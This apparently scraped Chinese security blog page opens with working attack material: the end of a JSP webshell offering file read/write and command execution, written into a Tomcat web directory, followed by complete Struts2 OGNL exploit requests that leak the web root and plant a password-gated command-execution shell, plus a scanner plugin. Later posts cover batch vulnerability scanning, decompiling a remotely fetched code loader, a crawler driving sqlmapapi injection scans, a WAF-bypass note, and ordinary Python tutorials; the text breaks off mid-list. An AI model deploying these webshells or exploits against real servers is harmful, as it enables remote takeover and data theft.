cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} }catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); %^>^|^<--^>^| >"D:/Tomcat/webapps/ROOT/website/images/right.jsp"

 

下面是struts2的绕过~使用于一些未及时修复的.

1.获取路径

POST /index.action?title=CasterJs HTTP/1.1
Host: www.0day5.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: cookie
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 256

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------5423a63046c50524a84963968721%

 

2.根据获取到的路径写入shell

POST /index.action HTTP/1.1
Host: www.0day5.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: cookie
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 570

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new java.io.PrintWriter("/data/www/app/0day5/loggout.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"


-1
--------------------------5423a63046c50524a84963968721%

某平台的插件

    def verify(self):
        try:
            header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
            data = {r'xxoo': '1'}
            file = {'test': ('1.jpg', StringIO('1'))}
            req = requests.Request('POST', self.option.url, headers=header, data=data, files=file).prepare()
            req.body = req.body.replace('xxoo', r'redirect:/${"\u007e\u007e"+#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")+"\u007e\u007e"}')
            req.headers['Content-Length'] = len(req.body)
            s = requests.Session()
            reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)
            webroot = ''.join(re.findall(r'~~(.*?)~~', reponse.headers['Location'], re.S|re.I))
            if reponse.status_code == 302 and len(webroot):
                self.result.status = True
                self.result.description = "目标 {url} 存在st2命令执行漏洞, web路径为: {dir}".format(url=self.option.url, dir=webroot)
            else:
                self.result.status = False
                self.result.error = "不存在st2漏洞"
        except Exception, e:
            self.result.status = False
            self.result.error = str(e)

    def exploit(self):
        self.verify()

 

WVS_Patcher BatchScan tool

发布时间:September 23, 2015 // 分类:开发笔记,python,转帖文章,生活琐事 // 3 Comments

基本功能

  • 批量提交扫描任务
  • 允许并行扫描
  • 解析扫描结果,并将结果发送到邮箱

技术分析

上面的基本功能点,对应的关键技术点是:

  • bottle.py 简单的web
  • Queue(multiprocessing.Queue)
  • subprocessing调用wvs_console.exe

1.为什么使用bottle.py?

调用wvs_console.exe的脚本,自然而然的选择了Python。为了方便用户交互,需要有简单的Web页面。Web和Python也要交互,那就选择了Python Web。简单的Web页面,选择了轻量级的bottle.py,基本上不存在学习曲线。

所以程序的简图是这样的:

/static/img/20150922——wvs_patcher_assistant_for_wvs_scaner

2.为什么使用multiprocessing提供的Queue,而不是直接调用Queue?

结论就是: 队列对象不能在父进程与子进程间通信。为了解决多进程之间的Queue通信问题,multiprocessing封装了Queue。使用方法与Queue基本相同。

3.如何做到扫描不阻塞进程,扫描完成后马上得到通知?

扫描完成后马上得到通知,意味着必须要有一个进程阻塞,等待程序的结束。对于用户来说,主进程不阻塞,也就是提供web服务的进程不阻塞,就可以了。所以在主进程开subprocessing,调用wvs.py,然后去做别的事情了。wvs.py又调用subprocessing来跑wvs_console.exe,这次是阻塞的,等到程序跑完之后,再调用主进程的接口,说“我~到~家~了~”。

4.队列在程序中起到了怎样的作用?

在程序中用到了两个队列,waiting_queue & scaning_queue。其中scaning_queue的大小,就是允许并行扫描的数量。waiting_queue是无限大的,web提交的任务直接添加到waiting_queue中,然后等待scaning_queue有空位的时候,就进入scaning_queue,扫描完成后,释放scaning_queue…

Github 项目主页: WVS_Patcher

功能增强版说明:
1.使用场景
1.家里有一台闲置电脑,想利用来挖漏洞
2.家中的网线没有独立ip,不能随时分配任务

2.变动说明:
增加了seed.py和sower.py两个文件:
sower.py用来获取第三方网站上的数据并将任务派发给wvs_patcher
seed.py用来编码要扫描的网站,方便更新第三方网站上的数据
原理:
sower.py每隔20秒请求第三方网站的页面数据,发现有更新自动添加到wvs_patcher。
seed.py===================>第三方网站<==================>sower.py

 

3.使用说明
1.按照说明正常运行wvs_patcher
2.修改sower.py中server,header参数,设置好第三方网站的信息(推荐使用xnote等网络记事本)。新开一个窗口,运行sower.py,然后就可以出去上班了(文件中默认的server是xnote的一条记事本记录,可自行替换)
3.上班休息时间突然想扫一下某个网站,使用seed.py生成数据,复制并且更新xnote记事本就可以添加到wvs的扫描任务中了。
4.运行中出现任何错误会邮件通知到wvs_patcher配置的callback邮箱中

wvs_patcher

利用uncompyle去搞定marshal.loads

发布时间:September 21, 2015 // 分类:运维工作,开发笔记,linux,windows,python,生活琐事 // 4 Comments

最近一直再解密一个东西.到了

marshal.loads(zlib.decompress(urllib.urlopen(url).read()))

就没办法继续下一步了。中间休顿了好久.今天碰巧看到一篇关于这个的文章,记录下

主要应用的是 uncompyle 库
网上增强版众多,有机会还是得深入到原理去学习一下,以待自己能改进.
stackoverflow上面看搜到一些答案(多去多收获啊….)
http://stackoverflow.com/questions/8189352/decompile-python-2-7-pyc
下载库文件
https://github.com/wibiti/uncompyle2
安装
 

python setup.py install

—————————序列化导—————————

import uncompyle2
import marshal

co = marshal.loads(zlib.decompress(“/x/x/x/x/x/x/xx/x/x/x”))

f=open('/tmp/testa','w');
uncompyle2.uncompyle('2.7.3',co,f);

也不卖关子了.直接贴上

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib, urllib2, marshal, zlib, time, re, sys
import uncompyle2
#第一访问
#re = requests.get('https://www.bugscan.net/0a772492fbe89800')
#print re.content
#re = urllib2.urlopen('https://www.bugscan.net/0a772492fbe89800').read()
#print re
'''
#第一次的结果
#!/usr/bin/env python
import imp
if imp.get_magic() != '\x03\xf3\r\n':
    print "Please update to Python 2.7.3 (http://www.python.org/download/)"
    exit()

import urllib, marshal, zlib, time, re, sys
for k in sys._getframe(1).f_code.co_consts:
    if not isinstance(k, basestring):
        continue
    m = re.match(r"http[s]*://[\w\.]+/[\?\w]*([0-9a-f]{16})", k)
    if m:
        _S = "https"
        _B = "www.bugscan.net"
        _U = m.group(1)
        _C = True
        count = 30
        while _C:
            if count <= 0:
                break
            try:
                exec marshal.loads(zlib.decompress(urllib.urlopen('%s://%s/bin/core_new' % (_S, _B)).read()))
            except:
                time.sleep(240)
            count = count - 1
        break

'''
#从结果里面找到的
url = 'https://www.bugscan.net/bin/core_new'
data1 = marshal.loads(zlib.decompress(urllib.urlopen(url).read()))
f=open('./bugscan.py','w');
uncompyle2.uncompyle('2.7.3',data1,f);

参考:

http://wcf1987.iteye.com/blog/1672542

http://www.blackh4t.org/archives/969.html

兔大侠整理的MySQLdb Python封装类

发布时间:September 13, 2015 // 分类:开发笔记,工作日志,运维工作,代码学习,linux,python,windows,mysql // No Comments

我一直没弄明白一件事情,Python语言已经这么流行和成熟了,为什么使用MySQL的方式却如此原始。Python 2下大家推崇的依旧是使用MySQLdb这个第三方的模块,而其使用方式还是手写方法,没有一个比较权威的封装类。或许是我孤陋寡闻?

根据官方文档及一些网上的样例,兔哥整理了一个MySQLdb的封装类。基本上涵盖了常用的函数,一般开发应该够用了。

#!/usr/bin/env python
# -*- coding: utf-8 -*- 
u'''对MySQLdb常用函数进行封装的类
 
 整理者:兔大侠和他的朋友们(http://www.tudaxia.com)
 日期:2014-04-22
 出处:源自互联网,共享于互联网:-)
 
 注意:使用这个类的前提是正确安装 MySQL-Python模块。
 官方网站:http://mysql-python.sourceforge.net/
'''

import MySQLdb
import time

class MySQL:
    u'''对MySQLdb常用函数进行封装的类'''
    
    error_code = '' #MySQL错误号码

    _instance = None #本类的实例
    _conn = None # 数据库conn
    _cur = None #游标

    _TIMEOUT = 30 #默认超时30秒
    _timecount = 0
        
    def __init__(self, dbconfig):
        u'构造器:根据数据库连接参数,创建MySQL连接'
        try:
            self._conn = MySQLdb.connect(host=dbconfig['host'],
                                         port=dbconfig['port'], 
                                         user=dbconfig['user'],
                                         passwd=dbconfig['passwd'],
                                         db=dbconfig['db'],
                                         charset=dbconfig['charset'])
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            error_msg = 'MySQL error! ', e.args[0], e.args[1]
            print error_msg
            
            # 如果没有超过预设超时时间,则再次尝试连接,
            if self._timecount &lt; self._TIMEOUT:
                interval = 5
                self._timecount += interval
                time.sleep(interval)
                return self.__init__(dbconfig)
            else:
                raise Exception(error_msg)
        
        self._cur = self._conn.cursor()
        self._instance = MySQLdb

    def query(self,sql):
        u'执行 SELECT 语句'     
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result

    def update(self,sql):
        u'执行 UPDATE 及 DELETE 语句'
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
            self._conn.commit()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result
        
    def insert(self,sql):
        u'执行 INSERT 语句。如主键为自增长int,则返回新生成的ID'
        try:
            self._cur.execute("SET NAMES utf8")
            self._cur.execute(sql)
            self._conn.commit()
            return self._conn.insert_id()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            return False
    
    def fetchAllRows(self):
        u'返回结果列表'
        return self._cur.fetchall()

    def fetchOneRow(self):
        u'返回一行结果,然后游标指向下一行。到达最后一行以后,返回None'
        return self._cur.fetchone()
 
    def getRowCount(self):
        u'获取结果行数'
        return self._cur.rowcount
                          
    def commit(self):
        u'数据库commit操作'
        self._conn.commit()
                        
    def rollback(self):
        u'数据库回滚操作'
        self._conn.rollback()
           
    def __del__(self): 
        u'释放资源(系统GC自动调用)'
        try:
            self._cur.close() 
            self._conn.close() 
        except:
            pass
        
    def  close(self):
        u'关闭数据库连接'
        self.__del__()
 

if __name__ == '__main__':
    '''使用样例'''
    
    #数据库连接参数  
    dbconfig = {'host':'localhost', 
                'port': 3306, 
                'user':'dbuser', 
                'passwd':'dbpassword', 
                'db':'testdb', 
                'charset':'utf8'}
    
    #连接数据库,创建这个类的实例
    db = MySQL(dbconfig)
    
    #操作数据库
    sql = "SELECT * FROM `sample_table`"
    db.query(sql);
    
    #获取结果列表
    result = db.fetchAllRows();
    
    #相当于php里面的var_dump
    print result
    
    #对行进行循环
    for row in result:
        #使用下标进行取值
        #print row[0]
        
        #对列进行循环
        for colum in row:
            print colum
 
    #关闭数据库
    db.close()

 

Python中的GIL、多进程和多线程

发布时间:September 7, 2015 // 分类:开发笔记,代码学习,python,生活琐事 // No Comments

1 GIL(Global Interpretor Lock,全局解释器锁)

关于GIL的部分信息参见

http://www.jeffknupp.com/blog/2012/03/31/pythons-hardest-problem/
http://www.oschina.net/translate/pythons-hardest-problem
https://news.ycombinator.com/item?id=5815567
http://www.dabeaz.com/GIL/

如果其他条件不变,Python程序的执行速度直接与解释器的“速度”相关。不管你怎样优化自己的程序,你的程序的执行速度还是依赖于解释器执行你的程序的效率。
目前来说,多线程执行还是利用多核系统最常用的方式。尽管多线程编程大大好于“顺序”编程,不过即便是仔细的程序员也没法在代码中将并发性做到最好。
对于任何Python程序,不管有多少的处理器,任何时候都总是只有一个线程在执行。
事实上,这个问题被问得如此频繁以至于Python的专家们精心制作了一个标准答案:”不要使用多线程,请使用多进程。“但这个答案比那个问题更加让人困惑。
GIL对诸如当前线程状态和为垃圾回收而用的堆分配对象这样的东西的访问提供着保护。然而,这对Python语言来说没什么特殊的,它需要使用一个GIL。这是该实现的一种典型产物。现在也有其它的Python解释器(和编译器)并不使用GIL。虽然,对于CPython来说,自其出现以来已经有很多不使用GIL的解释器。
不管某一个人对Python的GIL感觉如何,它仍然是Python语言里最困难的技术挑战。想要理解它的实现需要对操作系统设计、多线程编程、C语言、解释器设计和CPython解释器的实现有着非常彻底的理解。单是这些所需准备的就妨碍了很多开发者去更彻底的研究GIL。

2 threading

threading 模块提供比/基于 thread 模块更高层次的接口;如果此模块由于 thread 丢失而无法使用,可以使用 dummy_threading 来代替。

CPython implementation detail: In CPython, due to the Global Interpreter Lock, only one thread can execute Python code at once (even though certain performance-oriented libraries might overcome this limitation). If you want your application to make better use of the computational resources of multi-core machines, you are advised to use multiprocessing. However, threading is still an appropriate model if you want to run multiple I/O-bound tasks simultaneously.
 

import threading, zipfile

class AsyncZip(threading.Thread):
    def __init__(self, infile, outfile):
        threading.Thread.__init__(self)
        self.infile = infile
        self.outfile = outfile
    def run(self):
        f = zipfile.ZipFile(self.outfile, 'w', zipfile.ZIP_DEFLATED)
        f.write(self.infile)
        f.close()
        print 'Finished background zip of: ', self.infile

background = AsyncZip('mydata.txt', 'myarchive.zip')
background.start()
print 'The main program continues to run in foreground.'

background.join()    # Wait for the background task to finish
print 'Main program waited until background was done.'

2.1 创建线程

import threading
import datetime

class ThreadClass(threading.Thread):
     def run(self):
         now = datetime.datetime.now()
         print "%s says Hello World at time: %s" % (self.getName(), now)

for i in range(2):
    t = ThreadClass()
    t.start()

2.2 使用线程队列

import Queue
import threading
import urllib2
import time
from BeautifulSoup import BeautifulSoup

hosts = ["http://yahoo.com", "http://google.com", "http://amazon.com",
        "http://ibm.com", "http://apple.com"]

queue = Queue.Queue()
out_queue = Queue.Queue()

class ThreadUrl(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue, out_queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.out_queue = out_queue

    def run(self):
        while True:
            #grabs host from queue
            host = self.queue.get()

            #grabs urls of hosts and then grabs chunk of webpage
            url = urllib2.urlopen(host)
            chunk = url.read()

            #place chunk into out queue
            self.out_queue.put(chunk)

            #signals to queue job is done
            self.queue.task_done()

class DatamineThread(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, out_queue):
        threading.Thread.__init__(self)
        self.out_queue = out_queue

    def run(self):
        while True:
            #grabs host from queue
            chunk = self.out_queue.get()

            #parse the chunk
            soup = BeautifulSoup(chunk)
            print soup.findAll(['title'])

            #signals to queue job is done
            self.out_queue.task_done()

start = time.time()
def main():

    #spawn a pool of threads, and pass them queue instance
    for i in range(5):
        t = ThreadUrl(queue, out_queue)
        t.setDaemon(True)
        t.start()

    #populate queue with data
    for host in hosts:
        queue.put(host)

    for i in range(5):
        dt = DatamineThread(out_queue)
        dt.setDaemon(True)
        dt.start()


    #wait on the queue until everything has been processed
    queue.join()
    out_queue.join()

main()
print "Elapsed Time: %s" % (time.time() - start)

3 dummy_threading(threading的备用方案)

dummy_threading 模块提供完全复制了threading模块的接口,如果无法使用thread,则可以用这个模块替代.

使用方法:

try:
    import threading as _threading
except ImportError:
    import dummy_threading as _threading

4 thread

在Python3中叫 _thread,应该尽量使用 threading 模块替代。

5 dummy_thread(thead的备用方案)

dummy_thread 模块提供完全复制了thread模块的接口,如果无法使用thread,则可以用这个模块替代.

在Python3中叫 _dummy_thread, 使用方法:

try:
    import thread as _thread
except ImportError:
    import dummy_thread as _thread

最好使用 dummy_threading 来代替.

6 multiprocessing(基于thread接口的多进程)

https://docs.python.org/2/library/multiprocessing.html

使用 multiprocessing 模块创建子进程而不是线程来克服GIL引起的问题.

from multiprocessing import Pool

def f(x):
    return x*x

if __name__ == '__main__':
    p = Pool(5)
    print(p.map(f, [1, 2, 3]))

6.1 Process类
创建进程是使用Process类:

from multiprocessing import Process

def f(name):
    print 'hello', name

if __name__ == '__main__':
    p = Process(target=f, args=('bob',))
    p.start()
    p.join()

6.2 进程间通信
Queue 方式:

from multiprocessing import Process, Queue

def f(q):
    q.put([42, None, 'hello'])

if __name__ == '__main__':
    q = Queue()
    p = Process(target=f, args=(q,))
    p.start()
    print q.get()    # prints "[42, None, 'hello']"
    p.join()

Pipe 方式:

from multiprocessing import Process, Pipe

def f(conn):
    conn.send([42, None, 'hello'])
    conn.close()

if __name__ == '__main__':
    parent_conn, child_conn = Pipe()
    p = Process(target=f, args=(child_conn,))
    p.start()
    print parent_conn.recv()   # prints "[42, None, 'hello']"

6.3 同步
添加锁:

from multiprocessing import Process, Lock

def f(l, i):
    l.acquire()
    print 'hello world', i
    l.release()

if __name__ == '__main__':
    lock = Lock()

    for num in range(10):
        Process(target=f, args=(lock, num)).start()

6.4 共享状态
应该尽量避免共享状态.

共享内存方式:

from multiprocessing import Process, Value, Array

def f(n, a):
    n.value = 3.1415927
    for i in range(len(a)):
        a[i] = -a[i]

if __name__ == '__main__':
    num = Value('d', 0.0)
    arr = Array('i', range(10))

    p = Process(target=f, args=(num, arr))
    p.start()
    p.join()

    print num.value
    print arr[:]

Server进程方式:

from multiprocessing import Process, Manager

def f(d, l):
    d[1] = '1'
    d['2'] = 2
    d[0.25] = None
    l.reverse()

if __name__ == '__main__':
    manager = Manager()

    d = manager.dict()
    l = manager.list(range(10))

    p = Process(target=f, args=(d, l))
    p.start()
    p.join()

    print d
    print l

第二种方式支持更多的数据类型,如list, dict, Namespace, Lock, RLock, Semaphore, BoundedSemaphore, Condition, Event, Queue, Value ,Array.

6.5 Pool类
通过Pool类可以建立进程池:

from multiprocessing import Pool

def f(x):
    return x*x

if __name__ == '__main__':
    pool = Pool(processes=4)              # start 4 worker processes
    result = pool.apply_async(f, [10])    # evaluate "f(10)" asynchronously
    print result.get(timeout=1)           # prints "100" unless your computer is *very* slow
    print pool.map(f, range(10))          # prints "[0, 1, 4,..., 81]"

7 multiprocessing.dummy

在官方文档只有一句话:

multiprocessing.dummy replicates the API of multiprocessing but is no more than a wrapper around the threading module.
multiprocessing.dummy 是 multiprocessing 模块的完整克隆,唯一的不同在于 multiprocessing 作用于进程,而 dummy 模块作用于线程;
可以针对 IO 密集型任务和 CPU 密集型任务来选择不同的库. IO 密集型任务选择multiprocessing.dummy,CPU 密集型任务选择multiprocessing.

import urllib2 
from multiprocessing.dummy import Pool as ThreadPool 

urls = [
    'http://www.python.org', 
    'http://www.python.org/about/',
    'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
    'http://www.python.org/doc/',
    'http://www.python.org/download/',
    'http://www.python.org/getit/',
    'http://www.python.org/community/',
    'https://wiki.python.org/moin/',
    'http://planet.python.org/',
    'https://wiki.python.org/moin/LocalUserGroups',
    'http://www.python.org/psf/',
    'http://docs.python.org/devguide/',
    'http://www.python.org/community/awards/'
    # etc.. 
    ]

# Make the Pool of workers
pool = ThreadPool(4) 
# Open the urls in their own threads
# and return the results
results = pool.map(urllib2.urlopen, urls)
#close the pool and wait for the work to finish 
pool.close() 
pool.join() 

results = [] 
for url in urls:
   result = urllib2.urlopen(url)
   results.append(result)

8 后记

如果选择多线程,则应该尽量使用 threading 模块,同时注意GIL的影响
如果多线程没有必要,则使用多进程模块 multiprocessing ,此模块也通过 multiprocessing.dummy 支持多线程.
分析具体任务是I/O密集型,还是CPU密集型

参考:

爬虫结合sqlmapi判断注入

发布时间:September 5, 2015 // 分类:开发笔记,代码学习,python,生活琐事 // No Comments

最近在弄点蛋疼的东西.爬虫,扫描。扫描交给sqlmapapi来进行.现在的资料不是很多,但是还是可以找到一些

《使用sqlmapapi.py批量化扫描实践》http://drops.wooyun.org/tips/6653 

看看他所封装的sqlmapapi的类

#!/usr/bin/python
#-*-coding:utf-8-*-
import requests
import time
import json


class AutoSqli(object):

    """
    使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互

    By Manning
    """

    def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
        super(AutoSqli, self).__init__()
        self.server = server
        if self.server[-1] != '/':
            self.server = self.server + '/'
        self.target = target
        self.taskid = ''
        self.engineid = ''
        self.status = ''
        self.data = data
        self.referer = referer
        self.cookie = cookie
        self.start_time = time.time()

    #新建扫描任务    
    def task_new(self):
        self.taskid = json.loads(
            requests.get(self.server + 'task/new').text)['taskid']
        print 'Created new task: ' + self.taskid
        #得到taskid,根据这个taskid来进行其他的
        if len(self.taskid) > 0:
            return True
        return False

    #删除扫描任务
    def task_delete(self):
        if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
            print '[%s] Deleted task' % (self.taskid)
            return True
        return False

    #扫描任务开始
    def scan_start(self):
        headers = {'Content-Type': 'application/json'}
        #需要扫描的地址
        payload = {'url': self.target}
        url = self.server + 'scan/' + self.taskid + '/start'
        #http://127.0.0.1:8557/scan/xxxxxxxxxx/start
        t = json.loads(
            requests.post(url, data=json.dumps(payload), headers=headers).text)
        self.engineid = t['engineid']
        if len(str(self.engineid)) > 0 and t['success']:
            print 'Started scan'
            return True
        return False

    #扫描任务的状态
    def scan_status(self):
        self.status = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
        if self.status == 'running':
            return 'running'
        elif self.status == 'terminated':
            return 'terminated'
        else:
            return 'error'

    #扫描任务的细节
    def scan_data(self):
        self.data = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
        if len(self.data) == 0:
            print 'not injection:\t'
        else:
            print 'injection:\t' + self.target

    #扫描的设置,主要的是参数的设置
    def option_set(self):
        headers = {'Content-Type': 'application/json'}
        option = {"options": {
                    "smart": True,
                    ...
                    }
                 }
        url = self.server + 'option/' + self.taskid + '/set'
        t = json.loads(
            requests.post(url, data=json.dumps(option), headers=headers).text)
        print t

    #停止扫描任务
    def scan_stop(self):
        json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']

    #杀死扫描任务进程
    def scan_kill(self):
        json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']

    def run(self):
        if not self.task_new():
            return False
        self.option_set()
        if not self.scan_start():
            return False
        while True:
            if self.scan_status() == 'running':
                time.sleep(10)
            elif self.scan_status() == 'terminated':
                break
            else:
                break
            print time.time() - self.start_time
            if time.time() - self.start_time > 3000:
                error = True
                self.scan_stop()
                self.scan_kill()
                break
        self.scan_data()
        self.task_delete()
        print time.time() - self.start_time

if __name__ == '__main__':
    t = AutoSqli('http://127.0.0.1:8774', 'http://192.168.3.171/1.php?id=1')
    t.run()

它的工作过程是

    get请求创建任务, 获取到任务id
    get请求特定的任务id设置参数
    post请求特定的任务id开始扫描指定url
    get请求特定的任务id获取状态
    get请求特定的任务id获取测试结果
    get请求特定的任务id删除任务

进入到lib/utils/api.py的server类,可以发现通过向server提交数据进行与服务的交互。 一共分为3种类型。

    Users' methods 用户方法
    Admin function 管理函数
    sqlmap core interact functions 核心交互函数
可以提交数据的种类如下。

用户方法

    @get("/task/new")
    @get("/task//delete")
管理函数

    @get("/admin//list")
    @get("/admin//flush")
核心交互函数

    @get("/option//list")
    @post("/option//get")
    @post("/option//set")
    @post("/scan//start")
    @get("/scan//stop")
    @get("/scan//kill")
    @get("/scan//status")
    @get("/scan//data")
    @get("/scan//log//")
    @get("/scan//log")
    @get("/download///")
最后对于是否是有注入漏洞, 代码里面是这么判断的, 如果返回的字典中, data里面有值, 那么就有注入

然后从https://github.com/smarttang/w3a_Scan_Console/blob/master/module/sprider_module.py里面得到爬虫模块.稍微整合一下

#!/usr/bin/python
# vim: set fileencoding=utf-8:

import sys
import urllib2
import re
from BeautifulSoup import BeautifulSoup

import autosql

class SpriderUrl:
    # 初始化
    def __init__(self,url):
        self.url=url
        #self.con=Db_Connector('sprider.ini')

#获得目标url的第一次url清单
    def get_self(self):
        urls=[]
        try:
            body_text=urllib2.urlopen(self.url).read()
        except:
            print "[*] Web Get Error:checking the Url"
        soup=BeautifulSoup(body_text)
        links=soup.findAll('a')
        for link in links:
            # 获得了目标的url但还需要处理
            _url=link.get('href')
             # 接着对其进行判断处理
             # 先判断它是否是无意义字符开头以及是否为None值
             # 判断URL后缀,不是列表的不抓取
            if re.match('^(javascript|:;|#)',_url) or _url is None or re.match('.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf|txt|db)$',_url):
                continue
            # 然后判断它是不是http|https开头,对于这些开头的都要判断是否是本站点, 不做超出站点的爬虫
            if re.match('^(http|https)',_url):
                if not re.match('^'+self.url,_url):
                    continue
                else:
                    urls.append(_url)
            else:
                urls.append(self.url+_url)
        rst=list(set(urls))
        for rurl in rst:
            try:
                self.sprider_self_all(rurl)
                # 进行递归,但是缺点太明显了,会对全部的页面进行重复递归。然后递交进入autosql
                # AutoSqli('http://127.0.0.1:8775', rurl).run
            except:
                print "spider error"

    def sprider_self_all(self,domain):
        urls=[]
        try:
            body_text=urllib2.urlopen(domain).read()
        except:
            print "[*] Web Get Error:checking the Url"
            sys.exit(0)
        soup=BeautifulSoup(body_text)
        links=soup.findAll('a')
        for link in links:
            # 获得了目标的url但还需要处理
            _url=link.get('href')
             # 接着对其进行判断处理
             # 先判断它是否是无意义字符开头以及是否为None值
             # 判断URL后缀,不是列表的不抓取
            try:
                if re.match('^(javascript|:;|#)',str(_url)) or str(_url) is None or re.match('.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf|txt|db)$',str(_url)):
                    continue
            except TypeError:
                print "[*] Type is Error! :"+str(_url)
                continue
            # 然后判断它是不是http|https开头,对于这些开头的都要判断是否是本站点, 不做超出站点的爬虫
            if re.match('^(http|https)',_url):
                if not re.match('^'+self.url,_url):
                    continue
                else:
                    urls.append(_url)
            else:
                urls.append(self.url+_url)
        res=list(set(urls))
        for rurl in res:
            try:
                print rurl
                #AutoSqli('http://127.0.0.1:8775', rurl).run
            except:
                print "spider error"

spi="http://0day5.com/"
t=SpriderUrl(spi)
# # 第一次捕获
t.get_self()

最好的办法还是存进数据库里面,然后检查是否重复。

        for rurl in res:
            if self.con.find_item("select * from url_sprider where url='"+rurl+"' and domain='"+self.url+"'"):
                continue
            else:
                try:
                    self.con.insert_item("insert into url_sprider(url,tag,domain)values('"+rurl+"',0,'"+self.url+"')")
                except:
                    print "[*] insert into is Error!"

 

 

最近依旧在整理这爬虫的资料:

1.针对很多爬虫有明显特征的办法就是指定相对应的User-Agent

2.针对部分WAF则可以采取来路来进行Bypass。如果是百度的呢

改进了下

    USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
